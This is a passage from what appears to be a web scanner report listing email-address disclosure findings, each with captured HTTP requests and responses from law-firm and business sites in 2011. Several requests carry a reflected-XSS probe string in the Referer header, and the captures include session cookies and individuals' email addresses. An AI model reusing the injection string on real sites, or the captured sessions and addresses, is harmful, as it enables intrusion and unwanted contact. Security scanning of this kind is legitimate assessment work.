<meta NAME="ROBOT
...[SNIP]...
<a href="mailto:postmaster@howardrice.com">mailto:postmaster@howardrice.com</a>
...[SNIP]...
27.3. https://client.poynerspruill.com/Pages/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /Pages/Home.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Pages/Home.aspx HTTP/1.1
Host: client.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx
Cookie: __utma=27281085.1533661144.1305216539.1305216539.1305218531.2; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill; __utmb=27281085.2.10.1305218531

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 41418
Content-Type: text/html; charset=utf-8
Expires: Wed, 27 Apr 2011 16:42:24 GMT
Last-Modified: Thu, 12 May 2011 16:42:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 16:42:24 GMT

<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HEAD><meta name="GENERATOR" content="Microsoft SharePoint" /><meta name="progid" content="SharePoint.WebPartPa
...[SNIP]...
<A onfocus="OnLink(this)" HREF="mailto:help@poynerspruill.com?Subject=p.s.portal login problem">
...[SNIP]...
27.4. http://imagesrv.gartner.com/media/jwplayer/flowplayer.ipad-3.2.1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /media/jwplayer/flowplayer.ipad-3.2.1.js

Issue detail

The following email address was disclosed in the response:

Request

GET /media/jwplayer/flowplayer.ipad-3.2.1.js;pv71aaa65e2d185966 HTTP/1.1
Host: imagesrv.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/vendor-insights/procurement-sourcing-technology.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231763750:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.3.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 12 Feb 2011 03:27:52 GMT
Content-Type: application/x-javascript
ETag: "pv71aaa65e2d18596612b2ad81f0420b21"
Expires: Sat, 29 Oct 2011 03:43:32 GMT
Cache-Control: max-age=15724800
X-PvInfo: [S11101.C165520.A165329.RA0.G2868D.UCC3A812].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:22:50 GMT
Age: 2892
Content-Length: 21913

/**
* ipad.js 3.2.1. The Flowplayer API
*
* Copyright 2010 Flowplayer Oy
* By Thomas Dubois <thomas@flowplayer.org>
*
* This file is part of Flowplayer.
*
* Flowplayer is free software: you ca
...[SNIP]...
27.5. http://layserfreiwald.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=7d8fe508%2D7e3a%2D406d%2D978b%2Daf2ef35e4854; path=/; expires=Sat, 11-May-2041 02:00:28 GMT
Set-Cookie: CFTOKEN=0; path=/; expires=Sat, 11-May-2041 02:00:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<input type="hidden" value="LSD@layserfreiwald.com,josh@emailmessaging.net" name="admin_email_addr">
...[SNIP]...
27.6. http://layserfreiwald.com/attorneys.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /attorneys.html?mode=view&AID=2 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.5.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:40:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 15289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<a href="mailto:ajf@layserfreiwald.com">ajf@layserfreiwald.com</a>
...[SNIP]...
<input type="hidden" value="LSD@layserfreiwald.com,josh@emailmessaging.net" name="admin_email_addr">
...[SNIP]...
27.7. http://layserfreiwald.com/attorneys.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /attorneys.html?mode=view&AID=8 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<a href="mailto:gae@layserfreiwald.com">gae@layserfreiwald.com</a>
...[SNIP]...
<input type="hidden" value="LSD@layserfreiwald.com,josh@emailmessaging.net" name="admin_email_addr">
...[SNIP]...
27.8. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /practice_areas/insurance_coverage_and_bad_faith.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /practice_areas/insurance_coverage_and_bad_faith.html HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 8655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<input type="hidden" value="LSD@layserfreiwald.com,josh@emailmessaging.net" name="admin_email_addr">
...[SNIP]...
27.9. https://mail.howardrice.com/exchweb/bin/auth/owalogon.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.howardrice.com
Path:   /exchweb/bin/auth/owalogon.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /exchweb/bin/auth/owalogon.asp?url=https://mail.howardrice.com/exchange&reason=0 HTTP/1.1
Host: mail.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.howardrice.com/6862
Cookie: __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=; ASPSESSIONIDCAQSTDSB=JDOHJDACAHGBKFPAPMCLDHLB

Response

HTTP/1.1 200 OK
Content-Length: 8361
Expires: Thu, 12 May 2011 16:12:59 GMT
Date: Thu, 12 May 2011 16:13:59 GMT
Content-Type: text/html
Cache-Control: no-cache
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


<!-- {57A118C6-2DA9-419d-BE9A-F92B0F9A418B} -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights reserved.-->
<HTML >
...[SNIP]...
<a href="mailto:postmaster@howardrice.com">postmaster@howardrice.com</a>
...[SNIP]...
27.10. http://www.capgroup.com/_js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capgroup.com
Path:   /_js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_js/s_code.js HTTP/1.1
Host: www.capgroup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capgroup.com/
Cookie: WEBTRENDS_ID=173.193.214.243-1305229471.977320

Response

HTTP/1.1 200 OK
Server: ""
Date: Thu, 12 May 2011 19:44:35 GMT
Content-length: 25626
Content-type: application/x-javascript
Last-modified: Fri, 29 Apr 2011 17:05:19 GMT
Etag: "641a-4dbaefcf"
Accept-ranges: bytes

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/*************************** Report Suite ID ***************************/
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...
27.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /feeds/ap/2009/05/26/ap6466854.html

Issue detail

The following email address was disclosed in the response:

Request

GET /feeds/ap/2009/05/26/ap6466854.html HTTP/1.1
Host: www.forbes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 12 May 2011 16:55:03 GMT
Server: Apache/1.3.26
Set-Cookie: RMID=adc1d6f34dcc10e0; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.forbes.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<html>
<head>
<title>Forbes.com File Not Found</title>
<script language="JavaScript">
var fdcchannel;
var fdcsponsor;
var globalPageType = "errorPage";
var displayedSection = "";
</script>
<d
...[SNIP]...
<a href="mailto:customerservice@forbes.net">
...[SNIP]...
27.12. http://www.fundingpost.com/breakfast/reg1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fundingpost.com
Path:   /breakfast/reg1.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /breakfast/reg1.asp HTTP/1.1
Host: www.fundingpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:58:00 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 31878
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASBDRADC=LEEPDOEBCHLNHGEIKICLELCC; path=/
Cache-control: private


<HTML>
<HEAD>
<TITLE>Media and Entertainment Investing Conference on Thursday, Oct 27, 2011 in Miami, FL</TITLE>

<style type="text/css">
#gg3557883 {display: none;}

.photovideo
{
...[SNIP]...
<meta name="reply-to" content="info@Fundingpost.com">
...[SNIP]...
27.13. http://www.glaala.org/clubportal/glaala/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glaala.org
Path:   /clubportal/glaala/index.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /clubportal/glaala/index.cfm HTTP/1.1
Host: www.glaala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522753;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Set-Cookie: CFTOKEN=12f7bbc61c5272e7-E565EA0E-BA1E-6532-B5060418FAD67737;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522753%26CFTOKEN%23%3D12f7bbc61c5272e7%2DE565EA0E%2DBA1E%2D6532%2DB5060418FAD67737%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A12%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A12%27%7D%23hitcount%3D2%23cftoken%3D12f7bbc61c5272e7%2DE565EA0E%2DBA1E%2D6532%2DB5060418FAD67737%23cfid%3D26522753%23;expires=Sat, 04-May-2041 18:09:12 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head>
   <LINK REL="SHORTCUT ICON" HREF="/clubportal/images/clubimages/194/favicon.ico">
   <title>
   legal administrator, ala, GLA, los angeles -
   </title>
   
   
           <meta name="keyw
...[SNIP]...
l be rescheduled. We are tenatatively considering Thursday, June 9 (12:00 p.m.) for our rescheduled meeting - please pencil this in on your calendar.

Multi-Office Roundtable - Contact John Purins at JVPurins@ReedSmith.com for details.
       </td>
...[SNIP]...
<a href="mailto:nayala@ghplaw.com?subject=Member Feedback" onmouseover="window.status='Member Feedback'; return true;" onmouseout="window.status=''; return true;" class="MAROONLINK">
...[SNIP]...
27.14. http://www.glaala.org/clubportal/js/date-picker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glaala.org
Path:   /clubportal/js/date-picker.js

Issue detail

The following email address was disclosed in the response:

Request

GET /clubportal/js/date-picker.js HTTP/1.1
Host: www.glaala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.glaala.org/clubportal/glaala/index.cfm
Cookie: CFID=26522752; CFTOKEN=f93221608fca2a23-E565E7CC-C06D-5EE7-FF3571846EE026C4; CFGLOBALS=urltoken%3DCFID%23%3D26522752%26CFTOKEN%23%3Df93221608fca2a23%2DE565E7CC%2DC06D%2D5EE7%2DFF3571846EE026C4%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A11%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A11%27%7D%23hitcount%3D2%23cftoken%3Df93221608fca2a23%2DE565E7CC%2DC06D%2D5EE7%2DFF3571846EE026C4%23cfid%3D26522752%23

Response

HTTP/1.1 200 OK
Content-Length: 16882
Content-Type: application/x-javascript
Content-Location: http://www.glaala.org/clubportal/js/date-picker.js
Last-Modified: Mon, 10 Dec 2007 07:00:00 GMT
Accept-Ranges: bytes
ETag: "018bf47fa3ac81:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:09:13 GMT


<!-- Original: Kedar R. Bhave (softricks@hotmail.com) -->
<!-- Web Site: http://www.softricks.com -->

<!-- This script and many more are available free online at -->
<!-- The JavaScript Sourc
...[SNIP]...
27.15. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:04:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 77820

<!doctype html> <head> <title>Porter Wright Morris &amp; Arthur - Google Search</title> <script>window.google={kEI:"KgXMTajdGsmJ0QHC3dn2Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
<div class="s">David Zimmerman dzimmerman@porterwright.com p 614.227.1907 f 614.227.2100 <b>
...[SNIP]...
27.16. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:Xcoa2dGJc6eFiskK3KG6ORiAIYwRQQ:0TF_9CKD902Y-2IJ;Path=/accounts;Expires=Sat, 11-May-2013 16:55:21 GMT;Secure;HttpOnly
Set-Cookie: GALX=DR2YInS6kgQ;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 12 May 2011 16:55:21 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10951
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...
27.17. http://www.hartfordbusiness.com/fs_webkit/fs_toolbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/fs_toolbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /fs_webkit/fs_toolbox.js HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 25 Oct 2010 17:10:14 GMT
ETag: "126c5ee-4a4a-4937410c9e980"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 19018


$("document").ready( function(){
   if (window.onload && window.onload.actions){
       for (var ii = 0; window.onload.actions.length > ii; ii++) {
       if (window.onload.actions[ii]) window.onload.actio
...[SNIP]...
cus(function(){$(this).addClass("focused");});
   $("input").blur(function(){$(this).removeClass("focused");});
   
});
//window.onload.actions.push(beautifyForms);

/*
* PHP Serialize
* Morten Amundsen
* mor10am@gmail.com
*/
function fs_serialize(obj)
{
var string = '';

if (typeof(obj) == 'object') {
if (obj instanceof Array) {
string = 'a:';
tmpstring = '';
for (var
...[SNIP]...
27.18. http://www.hartfordbusiness.com/fs_webkit/jquery/dimensions_1.1.2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/jquery/dimensions_1.1.2.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /fs_webkit/jquery/dimensions_1.1.2.js HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 03 Jun 2008 13:25:59 GMT
ETag: "12705cd-14db-44ec30d8127c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 5339

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...
27.19. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The following email address was disclosed in the response:

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<p class="p_byline_credit">bkane@HartfordBusiness.com </p>
...[SNIP]...
27.20. http://www.lawseminars.com/detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawseminars.com
Path:   /detail.php

Issue detail

The following email address was disclosed in the response:

Request

GET /detail.php HTTP/1.1
Host: www.lawseminars.com
Accept: */*
Accept-Language: en
